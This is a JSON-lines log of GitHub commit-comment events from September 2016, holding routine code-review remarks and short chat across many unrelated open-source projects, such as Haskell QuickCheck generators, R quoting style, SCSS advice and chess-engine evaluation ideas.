{"id":"4578145051","type":"CommitCommentEvent","actor":{"login":"Appebyte"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19065087,"position":7,"line":7,"path":"Week 2/ahmed/Exercise4.hs","commit_id":"b79c86f490063471045c14bf668da723b038f0e0","created_at":"2016-09-17T15:31:03Z","updated_at":"2016-09-17T15:31:03Z","body":"Hmm interesting point. I'll get back to this! :-)"}},"created_at":"2016-09-17T15:31:03Z"}
{"id":"4578148590","type":"CommitCommentEvent","actor":{"login":"stephens999"},"repo":{"name":"m-murphy/haploid-scat"},"payload":{"comment":{"id":19065096,"position":null,"line":null,"path":null,"commit_id":"683dcceb225b36b827fff8a8bb672086b27c33ad","created_at":"2016-09-17T15:33:28Z","updated_at":"2016-09-17T15:33:28Z","body":"also the function update_Location which has some likelihood computations in it.\r\n"}},"created_at":"2016-09-17T15:33:28Z"}
{"id":"4578149316","type":"CommitCommentEvent","actor":{"login":"ChriZathens"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19065098,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-17T15:33:57Z","updated_at":"2016-09-17T15:33:57Z","body":"Hey, thanks a lot for the info!\r\nI guess I will have to wait for the next motion version, since I don't know how to apply the patch.. :)"}},"created_at":"2016-09-17T15:33:57Z"}
{"id":"4578149651","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19065099,"position":6,"line":28,"path":"Regular_Expressions/Introduction/lesson.yaml","commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T15:34:09Z","updated_at":"2016-09-17T15:34:09Z","body":"ok interesting. I felt double quotes are kind of old-fashioned in R. But I usually use them. Maybe just put these thoughts there as is, so people know about the pros and cons. However, you need double quotes to put quotes around quotes. For this, the double quotes have to be the outer quotes in order to get the right output. Try `'hi there \" high\"'` opposed to `\"hi there 'hi'\"` on the console.  Hence, it might be a good convention to use double quotes anyways and then, once you want to have two levels of quotes, just add single quotes within."}},"created_at":"2016-09-17T15:34:09Z"}
{"id":"4578149894","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19065101,"position":29,"line":60,"path":"languagetool-language-modules/ru/src/main/java/org/languagetool/rules/ru/MorfologikRussianSpellerRule.java","commit_id":"69b6286c4ddcafbea7f478f2a5c698c06764a5ba","created_at":"2016-09-17T15:34:17Z","updated_at":"2016-09-17T15:34:17Z","body":"Please check code indentation, it's currently not coherent (2 spaces)."}},"created_at":"2016-09-17T15:34:17Z"}
{"id":"4578149956","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19065102,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T15:34:20Z","updated_at":"2016-09-17T15:34:20Z","body":"When what how did this error appear?"}},"created_at":"2016-09-17T15:34:20Z"}
{"id":"4578151667","type":"CommitCommentEvent","actor":{"login":"stephens999"},"repo":{"name":"m-murphy/haploid-scat"},"payload":{"comment":{"id":19065107,"position":null,"line":null,"path":null,"commit_id":"683dcceb225b36b827fff8a8bb672086b27c33ad","created_at":"2016-09-17T15:35:28Z","updated_at":"2016-09-17T15:35:28Z","body":"YOu can input missing alleles in SCAT using -ve numbers (-999 usually). It is *just possible* the original code is valid if you  input one allele as missing at each locus... might be worth checking the logic. You can see various places where the code checks whether an allele or genotype is <0, or >=0 "}},"created_at":"2016-09-17T15:35:28Z"}
{"id":"4578152795","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19065111,"position":null,"line":null,"path":null,"commit_id":"d89b06bfbf84d89c4472e090660d74c5909fc0a9","created_at":"2016-09-17T15:36:15Z","updated_at":"2016-09-17T15:36:15Z","body":"Today I found out you can actually create custom data generators for QuickCheck. \r\nWhile even this small case is more time consuming than I initially expected, it might be useful for future reference:\r\n\r\n```Haskell\r\nimport Test.QuickCheck\r\n\r\ndata Symbol = Symbol String\r\n\r\ninstance Show Symbol where\r\n    show (Symbol x) = show x\r\n\r\nconstruct :: String -> Gen Symbol -> Gen Symbol\r\nconstruct a gb = do\r\n    (Symbol b) <- gb\r\n    return (Symbol (a ++ b))\r\n\r\ninstance Arbitrary Symbol where\r\n    arbitrary = sized arbSymbol\r\n        where arbSymbol s = if s == 0 then return (Symbol \"\") \r\n                else oneof [construct \"@\" (arbSymbol' (s-1)),\r\n                    construct \"#\" (arbSymbol' (s-1)),\r\n                    construct \"$\" (arbSymbol' (s-1)),\r\n                    construct \"%\" (arbSymbol' (s-1)),\r\n                    construct \"=\" (arbSymbol' (s-1))]\r\n                    where arbSymbol' s = arbSymbol s :: Gen Symbol\r\n```\r\n\r\nUsage example:\r\n```Haskell\r\nsymbolProp :: Symbol -> Bool\r\nsymbolProp x = rot13String x == x\r\n\r\n>>> generate arbitrary :: IO (Symbol)                            \r\n\"=%#=%$=%#@$$%#%##@%@@$%%##%=#$\"\r\n\r\n>>> quickCheck symbolProp\r\n+++ OK, passed 100 tests. \r\n```"}},"created_at":"2016-09-17T15:36:15Z"}
{"id":"4578154030","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19065114,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-17T15:37:07Z","updated_at":"2016-09-17T15:37:07Z","body":"@soumak77 The temp directory will keep me just as confused."}},"created_at":"2016-09-17T15:37:07Z"}
{"id":"4578154809","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065117,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T15:37:37Z","updated_at":"2016-09-17T15:37:37Z","body":"I can reproduce the new `main.js` !"}},"created_at":"2016-09-17T15:37:37Z"}
{"id":"4578155029","type":"CommitCommentEvent","actor":{"login":"ericduck40"},"repo":{"name":"elendirx/web2web"},"payload":{"comment":{"id":19065118,"position":null,"line":null,"path":null,"commit_id":"706e6b337d7d6aec066a7d915a9c9df666e088e3","created_at":"2016-09-17T15:37:46Z","updated_at":"2016-09-17T15:37:46Z","body":"Nice"}},"created_at":"2016-09-17T15:37:46Z"}
{"id":"4578155939","type":"CommitCommentEvent","actor":{"login":"spk921"},"repo":{"name":"e-lab/torch7-demos"},"payload":{"comment":{"id":19065121,"position":52,"line":174,"path":"RNN-train-sample/train.lua","commit_id":"98bebf55cf4f04e4231577f037c7769b6231f647","created_at":"2016-09-17T15:38:21Z","updated_at":"2016-09-17T15:38:21Z","body":" rnn_state[0] = rnn_state[#rnn_state] This works as well. But bottom one makes more sense to me. Since we are looking at 4 sequences to find the pattern. But other ways upper one can be understandable as well. \r\nBelow out put is rnn_state[0] = init_state \r\n<img width=\"505\" alt=\"init_state\" src=\"https://cloud.githubusercontent.com/assets/13938697/18609227/1c4f43d0-7ccb-11e6-8af7-0ae5896b69b8.png\">\r\nBelow one is rnn_state[0] = rnn_state[#rnn_state]\r\n<img width=\"510\" alt=\"rnn_state\" src=\"https://cloud.githubusercontent.com/assets/13938697/18609233/315ce6a6-7ccb-11e6-8d5b-7455c3f15bff.png\">\r\n"}},"created_at":"2016-09-17T15:38:21Z"}
{"id":"4578157083","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"MOVZX/Kenzo"},"payload":{"comment":{"id":19065125,"position":null,"line":null,"path":null,"commit_id":"fbfe5c5159a472f1562ead9ba542066a7d307700","created_at":"2016-09-17T15:39:11Z","updated_at":"2016-09-17T15:39:11Z","body":"You too, please maintain authorship to the original idea: https://github.com/flar2/kenzo/commit/6a85d83174b24f57b022d0c7c674cfc0367ab76d\r\n\r\nThis one is deprecated, I'm using the latest reference from: https://source.codeaurora.org/quic/la/kernel/msm-3.10/tree/arch/arm/boot/dts/qcom/msm8956-v1.1.dtsi?h=LA.BR.1.3.5-02110-8976.0#n134"}},"created_at":"2016-09-17T15:39:11Z"}
{"id":"4578157248","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19065126,"position":6,"line":28,"path":"Regular_Expressions/Introduction/lesson.yaml","commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T15:39:19Z","updated_at":"2016-09-17T15:39:19Z","body":"Ok cool - in that case I'm happy to make it a convention to use double quotes (rather than my lazy single quotes). I'll try remember to go through and change these at some stage."}},"created_at":"2016-09-17T15:39:19Z"}
{"id":"4578157827","type":"CommitCommentEvent","actor":{"login":"DartPower"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19065128,"position":null,"line":null,"path":null,"commit_id":"0dd03973f0d1b6353afd39379d60080a12416f68","created_at":"2016-09-17T15:39:42Z","updated_at":"2016-09-17T15:39:42Z","body":"1337-й коммит, поздравляю :D"}},"created_at":"2016-09-17T15:39:42Z"}
{"id":"4578158014","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065130,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T15:39:50Z","updated_at":"2016-09-17T15:39:50Z","body":"Could you not remove it entirely from version control and instead add some documentation that it needs to be created using `npm run bundleProduction` ?"}},"created_at":"2016-09-17T15:39:50Z"}
{"id":"4578158058","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19065131,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-17T15:39:51Z","updated_at":"2016-09-17T15:39:51Z","body":"@tolyo since the `base-apps-router` is under our control it can be updated to provide a config option which only outputs the routes config file and not the stripped down html.  This avoids having to put the output somewhere that is disregarded or that'll be overwritten later."}},"created_at":"2016-09-17T15:39:51Z"}
{"id":"4578159207","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19065135,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-17T15:40:33Z","updated_at":"2016-09-17T15:40:33Z","body":"@soumak77 That would fix it."}},"created_at":"2016-09-17T15:40:33Z"}
{"id":"4578159751","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065136,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T15:40:55Z","updated_at":"2016-09-17T15:40:55Z","body":"And thank you very much for trying another version!\r\n"}},"created_at":"2016-09-17T15:40:55Z"}
{"id":"4578160886","type":"CommitCommentEvent","actor":{"login":"gaqzi"},"repo":{"name":"gaqzi/radish"},"payload":{"comment":{"id":19065138,"position":18,"line":18,"path":"maybe/differs.py","commit_id":"9c46bb5f6b61aee5c08c8bbc6ae776ed3500cb12","created_at":"2016-09-17T15:41:42Z","updated_at":"2016-09-17T15:41:42Z","body":"Replaced with gitpython in 302dc5150cff26fd8e8b829b1a67ff6b5ed683f0"}},"created_at":"2016-09-17T15:41:42Z"}
{"id":"4578161283","type":"CommitCommentEvent","actor":{"login":"m-murphy"},"repo":{"name":"m-murphy/haploid-scat"},"payload":{"comment":{"id":19065140,"position":null,"line":null,"path":null,"commit_id":"683dcceb225b36b827fff8a8bb672086b27c33ad","created_at":"2016-09-17T15:41:57Z","updated_at":"2016-09-17T15:41:57Z","body":"Oh great, thank you for the advice!"}},"created_at":"2016-09-17T15:41:57Z"}
{"id":"4578161979","type":"CommitCommentEvent","actor":{"login":"guerler"},"repo":{"name":"bgruening/galaxy"},"payload":{"comment":{"id":19065143,"position":5,"line":100,"path":"client/galaxy/scripts/mvc/ui/ui-options.js","commit_id":"123aa562c0878406eb0eaa16eb857661da63996c","created_at":"2016-09-17T15:42:25Z","updated_at":"2016-09-17T15:42:25Z","body":"This block is not called if you set optional to true right? Extending the form library does not seem to be necessary."}},"created_at":"2016-09-17T15:42:25Z"}
{"id":"4578162142","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19065144,"position":5,"line":230,"path":".travis.yml","commit_id":"b1949ad5f52cf08aa34651928c190174b1a17315","created_at":"2016-09-17T15:42:31Z","updated_at":"2016-09-17T15:42:31Z","body":"I shouldn't remove the `test` option. I'll add it in a next commit."}},"created_at":"2016-09-17T15:42:31Z"}
{"id":"4578162546","type":"CommitCommentEvent","actor":{"login":"chinghanho"},"repo":{"name":"SquareJong/airfrog"},"payload":{"comment":{"id":19065146,"position":63,"line":106,"path":"sass/main.scss","commit_id":"a49c97698f5956dc211a1a6e7212b33d40e5eb6f","created_at":"2016-09-17T15:42:48Z","updated_at":"2016-09-17T15:42:48Z","body":"「圖層」類的元素要加上 z-index，例如 modal"}},"created_at":"2016-09-17T15:42:48Z"}
{"id":"4578164294","type":"CommitCommentEvent","actor":{"login":"chinghanho"},"repo":{"name":"SquareJong/airfrog"},"payload":{"comment":{"id":19065150,"position":null,"line":null,"path":"sass/main.scss","commit_id":"a49c97698f5956dc211a1a6e7212b33d40e5eb6f","created_at":"2016-09-17T15:43:57Z","updated_at":"2016-09-17T15:43:57Z","body":"寫 SCSS 不要過度依賴 nested syntax"}},"created_at":"2016-09-17T15:43:57Z"}
{"id":"4578166893","type":"CommitCommentEvent","actor":{"login":"aturkewi"},"repo":{"name":"learn-co-students/javascript-map-lab-react-000"},"payload":{"comment":{"id":19065155,"position":null,"line":null,"path":null,"commit_id":"3d6a22d2665fec676822c4ac54557d94cad4af90","created_at":"2016-09-17T15:45:40Z","updated_at":"2016-09-17T15:45:40Z","body":"Hey @samnags I'm going to roll this back. I'm guessing you didn't intend to merge your solution in for all future students going through this lab..."}},"created_at":"2016-09-17T15:45:40Z"}
{"id":"4578167285","type":"CommitCommentEvent","actor":{"login":"lorenzwalthert"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19065159,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T15:45:59Z","updated_at":"2016-09-17T15:45:59Z","body":"**Re: Re: Swirl in general**\r\nT and TRUE: Well for interactive usage, T is fine I guess. But for legibility, TRUE is better. Hence I guess it can be context specific, but that's probably a bit too much to introduce in this course. That would be a separate course on coding style. CMD Check gives you an error if you use T instead of TRUE also. I would allow both.\r\nQuestion IDs: ok, but what happens if you move content, i.e. add a new question? Can you ask questions conditional on how another question was answered? It just seems a good thing to have ids, but we are not in dire need for them either."}},"created_at":"2016-09-17T15:45:59Z"}
{"id":"4578169555","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19065163,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-17T15:47:33Z","updated_at":"2016-09-17T15:47:33Z","body":"Paul j'ai autre chose a faire"}},"created_at":"2016-09-17T15:47:33Z"}
{"id":"4578169902","type":"CommitCommentEvent","actor":{"login":"guerler"},"repo":{"name":"bgruening/galaxy"},"payload":{"comment":{"id":19065164,"position":null,"line":null,"path":null,"commit_id":"123aa562c0878406eb0eaa16eb857661da63996c","created_at":"2016-09-17T15:47:47Z","updated_at":"2016-09-17T15:47:47Z","body":"It is good to build the form inputs in the backend. We should focus on the API, make sure that it returns all user information at once and not worry about the UI for now."}},"created_at":"2016-09-17T15:47:47Z"}
{"id":"4578172988","type":"CommitCommentEvent","actor":{"login":"brunano21"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19065175,"position":111,"line":743,"path":"Combobox.js","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-17T15:49:59Z","updated_at":"2016-09-17T15:49:59Z","body":"Are you sure about setting the `query-success` listener only once? Am I wrong or when you set `this.list.query = {}` will fire a `query-success` event? In that case, are we sure we want to call `openDropDown()`?"}},"created_at":"2016-09-17T15:49:59Z"}
{"id":"4578176383","type":"CommitCommentEvent","actor":{"login":"isshenhao"},"repo":{"name":"isshenhao/oa"},"payload":{"comment":{"id":19065182,"position":null,"line":null,"path":null,"commit_id":"17f2335d9432d484853ab149d0e03f8f81e58dfa","created_at":"2016-09-17T15:52:12Z","updated_at":"2016-09-17T15:52:12Z","body":"999"}},"created_at":"2016-09-17T15:52:12Z"}
{"id":"4578177599","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/swirl-courses"},"payload":{"comment":{"id":19065187,"position":null,"line":null,"path":null,"commit_id":"34e63886d621415032d1c5b141414e595e2243f3","created_at":"2016-09-17T15:53:05Z","updated_at":"2016-09-17T15:53:05Z","body":"Yeah it could be useful in some cases (e.g for referencing a particular question dynamically and then not needing to update the reference when additional questions get added which change that questions position in the lesson. Maybe this is something that could be requested as a possible swirl enhancement?"}},"created_at":"2016-09-17T15:53:05Z"}
{"id":"4578178794","type":"CommitCommentEvent","actor":{"login":"not-a-user"},"repo":{"name":"AmatCoder/mednaffe"},"payload":{"comment":{"id":19065190,"position":null,"line":null,"path":null,"commit_id":"e58c719eb6e17b20637283d14ec097ae3c3c4866","created_at":"2016-09-17T15:53:55Z","updated_at":"2016-09-17T15:53:55Z","body":"This does not fix #34 (I tested). You have to allocate 15, which is the current number of supported systems and which is also hard-coded a few lines further down. (15 fixes it, I tested.)"}},"created_at":"2016-09-17T15:53:55Z"}
{"id":"4578181346","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19065200,"position":33,"line":64,"path":"languagetool-language-modules/ru/src/main/java/org/languagetool/rules/ru/MorfologikRussianSpellerRule.java","commit_id":"69b6286c4ddcafbea7f478f2a5c698c06764a5ba","created_at":"2016-09-17T15:55:32Z","updated_at":"2016-09-17T15:55:32Z","body":"Can't this be moved to the top of the method, so we stop as early as possible?"}},"created_at":"2016-09-17T15:55:32Z"}
{"id":"4578183497","type":"CommitCommentEvent","actor":{"login":"JustDuck"},"repo":{"name":"JustDuck/goodby-world"},"payload":{"comment":{"id":19065208,"position":null,"line":null,"path":null,"commit_id":"638fab0c8b1e7e1651c5a0c7c1c83037eb06d603","created_at":"2016-09-17T15:56:52Z","updated_at":"2016-09-17T15:56:52Z","body":"\r\n[JustDuckHome.txt](https://github.com/JustDuck/goodby-world/files/478245/JustDuckHome.txt)\r\n"}},"created_at":"2016-09-17T15:56:52Z"}
{"id":"4578184678","type":"CommitCommentEvent","actor":{"login":"JustDuck"},"repo":{"name":"JustDuck/goodby-world"},"payload":{"comment":{"id":19065214,"position":null,"line":null,"path":null,"commit_id":"638fab0c8b1e7e1651c5a0c7c1c83037eb06d603","created_at":"2016-09-17T15:57:41Z","updated_at":"2016-09-17T15:57:41Z","body":"adding my landing page converted to a text file"}},"created_at":"2016-09-17T15:57:41Z"}
{"id":"4578186340","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19065218,"position":null,"line":null,"path":null,"commit_id":"b82a030e9b55ff8dea548064e9a2a2204e2acbfa","created_at":"2016-09-17T15:58:47Z","updated_at":"2016-09-17T15:58:47Z","body":"What is the point in reducing these to longs? They will get rounding errors "}},"created_at":"2016-09-17T15:58:47Z"}
{"id":"4578187333","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19065220,"position":null,"line":null,"path":null,"commit_id":"b82a030e9b55ff8dea548064e9a2a2204e2acbfa","created_at":"2016-09-17T15:59:27Z","updated_at":"2016-09-17T15:59:27Z","body":"I mean we could use a double instead "}},"created_at":"2016-09-17T15:59:27Z"}
{"id":"4578187758","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19065221,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T15:59:43Z","updated_at":"2016-09-17T15:59:43Z","body":"@rduivenvoorde done.  Apparently also fixes a strange bug with the file selection dialog, which was only partly visible for me."}},"created_at":"2016-09-17T15:59:43Z"}
{"id":"4578189831","type":"CommitCommentEvent","actor":{"login":"JustDuck"},"repo":{"name":"JustDuck/goodby-world"},"payload":{"comment":{"id":19065227,"position":null,"line":null,"path":null,"commit_id":"638fab0c8b1e7e1651c5a0c7c1c83037eb06d603","created_at":"2016-09-17T16:00:50Z","updated_at":"2016-09-17T16:00:50Z","body":"adding my landing page converted to a text file"}},"created_at":"2016-09-17T16:00:50Z"}
{"id":"4578190223","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065228,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T16:01:05Z","updated_at":"2016-09-17T16:01:05Z","body":"> Could you not remove it entirely from version control and instead add some documentation that it needs to be created using npm run bundleProduction ?\r\n\r\nBut then all users just trying out a bit need to install node & npm and create this. I would like that our 3-liner is still working: https://github.com/graphhopper/graphhopper/blob/master/docs/core/quickstart-from-source.md#try-out"}},"created_at":"2016-09-17T16:01:05Z"}
{"id":"4578190276","type":"CommitCommentEvent","actor":{"login":"brunano21"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19065229,"position":53,"line":78,"path":"samples/Combobox.html","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-17T16:01:07Z","updated_at":"2016-09-17T16:01:07Z","body":"This was something I already was thinking about. I believe that the `filter()` function should call internally another _protected_ function (let's say `setQuery()` which sets only the list's query. In code, we can have something like:\r\n```\r\nfilter: function (filterText) {\r\n    ...\r\n    ...\r\n    this.list.query = this.setQuery(args);\r\n    ...\r\n    ...\r\n}\r\n```\r\n\r\nIn the combobox's case, `setQuery` is like:\r\n```\r\nsetQuery: function (args) {\r\n    return (new Filter()).match(this.list.labelAttr, rexExp);\r\n} \r\n```\r\n\r\nIn this way developers may have the freedom to override only `setQuery()` or only `filter()` or both functions, depending of their needs.\r\nWhat do you think?"}},"created_at":"2016-09-17T16:01:07Z"}
{"id":"4578196222","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19065237,"position":null,"line":null,"path":null,"commit_id":"0079074f9147f3b39cf544ad594ba60cb734e1c2","created_at":"2016-09-17T16:04:24Z","updated_at":"2016-09-17T16:04:24Z","body":"What about a more general bonus for bishops that attack (several) adjacent squares? That is, for example:\r\n```\r\nb = ei.attackedBy[Us][BISHOP]\r\nif (more_than_one(b & (shift_bb<DELTA_N>(b) | shift_bb<DELTA_E>(b))))\r\n    score += CloseBishops;\r\n```\r\nSomething a bit more complicated could fit in king safety..."}},"created_at":"2016-09-17T16:04:24Z"}
{"id":"4578197254","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19065240,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-17T16:05:06Z","updated_at":"2016-09-17T16:05:06Z","body":"Ok this is a good reason to have it ;) If there are more problems like this in the future maybe use the debug version (not minified/uglified) (?) "}},"created_at":"2016-09-17T16:05:06Z"}
{"id":"4578197864","type":"CommitCommentEvent","actor":{"login":"mertam"},"repo":{"name":"moravianlibrary/RecordManager2"},"payload":{"comment":{"id":19065242,"position":null,"line":null,"path":null,"commit_id":"319f9a325a6a5b9bcf39920ef7b37c2bb43c8e53","created_at":"2016-09-17T16:05:28Z","updated_at":"2016-09-17T16:05:28Z","body":"Tohle reseni podle me nema zadny vyznam. Tak jako tak bude porad dokola probihat kompilovani regexu. Ve static bloku by bylo lepsi vytvorit kolekci zkompilovanych Patternu, prave opakovana kompilace regexu je tady ta 'draha' operace."}},"created_at":"2016-09-17T16:05:28Z"}
{"id":"4578198339","type":"CommitCommentEvent","actor":{"login":"hawkrives"},"repo":{"name":"StoDevX/slack-invite-page"},"payload":{"comment":{"id":19065243,"position":4,"line":6,"path":"index.html","commit_id":"39978a93a8a466ac72f28e832c8ca3879f1aeec2","created_at":"2016-09-17T16:05:46Z","updated_at":"2016-09-17T16:05:46Z","body":"👍👌💯"}},"created_at":"2016-09-17T16:05:46Z"}
{"id":"4578198482","type":"CommitCommentEvent","actor":{"login":"ashanbrown"},"repo":{"name":"Nextdoor/ndkale"},"payload":{"comment":{"id":19065244,"position":6,"line":95,"path":"kale/__init__.py","commit_id":"b73777d8e3d910d11ea0d5ede305cc2ea3e903a2","created_at":"2016-09-17T16:05:52Z","updated_at":"2016-09-17T16:05:52Z","body":"I'd like to suggest that we have a default value of false for RUN_TASK_AS_CHILD if the settings file doesn't exist.  As it stands, we are breaking all existing installs of nd-kale."}},"created_at":"2016-09-17T16:05:52Z"}
{"id":"4578202320","type":"CommitCommentEvent","actor":{"login":"Gautony"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19065251,"position":null,"line":null,"path":null,"commit_id":"9ff8e0dbd3d9a43d0e399922f933961b94bdf592","created_at":"2016-09-17T16:08:21Z","updated_at":"2016-09-17T16:08:21Z","body":"Dear Team,\r\n\r\nIt is better, If after stopping to transfer some pokemons process, the Bot checks declared variables and then recycle the excess-ed item(s), because of full item space problem and need to restart the bot manually.\r\n\r\nIn addtionally, the version of 1.1.5.9 randomly reduce speed funtion does not work.\r\n\r\nThanks Team!"}},"created_at":"2016-09-17T16:08:21Z"}
{"id":"4578203553","type":"CommitCommentEvent","actor":{"login":"psychofad"},"repo":{"name":"gigabit101/QuantumStorage"},"payload":{"comment":{"id":19065253,"position":null,"line":null,"path":null,"commit_id":"d7c9ec875926aabc971c08969a6ea1368814e878","created_at":"2016-09-17T16:09:11Z","updated_at":"2016-09-17T16:09:11Z","body":"version numbering goes down now? :P"}},"created_at":"2016-09-17T16:09:11Z"}
{"id":"4578204212","type":"CommitCommentEvent","actor":{"login":"mertam"},"repo":{"name":"moravianlibrary/RecordManager2"},"payload":{"comment":{"id":19065254,"position":null,"line":null,"path":null,"commit_id":"5a512d7721f3321a03f4da3570ba0d83a0f12521","created_at":"2016-09-17T16:09:37Z","updated_at":"2016-09-17T16:09:37Z","body":"Bylo by dobre se zamyslet nad tim, jestli dostaneme ekvivalentni vysledky deduplikovani podobnosti, pokud byse tituly s similarity_enabled=false do tabulky tmp_periodicals_years vubec nedostaly.\r\n\r\nMohlo by se tim omezit mnostvi dat, ktere potom bude dalsi krok tahat z databaze a zpracovavat."}},"created_at":"2016-09-17T16:09:37Z"}
{"id":"4578205251","type":"CommitCommentEvent","actor":{"login":"samnags"},"repo":{"name":"learn-co-students/javascript-map-lab-react-000"},"payload":{"comment":{"id":19065259,"position":null,"line":null,"path":null,"commit_id":"3d6a22d2665fec676822c4ac54557d94cad4af90","created_at":"2016-09-17T16:10:17Z","updated_at":"2016-09-17T16:10:17Z","body":"I thought I fixed it! Eek thank you\n\n> On Sep 17, 2016, at 11:45 AM, Avidor Turkewitz <notifications@github.com> wrote:\n> \n> Hey @samnags I'm going to roll this back. I'm guessing you didn't intend to merge your solution in for all future students going through this lab...\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-17T16:10:17Z"}
{"id":"4578205364","type":"CommitCommentEvent","actor":{"login":"mbperez25"},"repo":{"name":"mbperez25/First-Repository"},"payload":{"comment":{"id":19065260,"position":null,"line":null,"path":null,"commit_id":"17b0fff0cc14d2c7f111bfed60558c17a72a16a6","created_at":"2016-09-17T16:10:21Z","updated_at":"2016-09-17T16:10:21Z","body":"Hi, I´m using GitHub"}},"created_at":"2016-09-17T16:10:21Z"}
{"id":"4578205761","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19065262,"position":5,"line":91,"path":"data/gui/widget/chatbox.cfg","commit_id":"33653e396945bf0e5d0ca56565149ae1f3328ba3","created_at":"2016-09-17T16:10:38Z","updated_at":"2016-09-17T16:10:38Z","body":"Is this the actual chat text? Making it smaller feels a bit dubious..."}},"created_at":"2016-09-17T16:10:38Z"}
{"id":"4578205864","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19065263,"position":null,"line":null,"path":null,"commit_id":"395d017a694c834a3fc0fb210372c3adef216502","created_at":"2016-09-17T16:10:42Z","updated_at":"2016-09-17T16:10:42Z","body":"Fixes #11 "}},"created_at":"2016-09-17T16:10:42Z"}
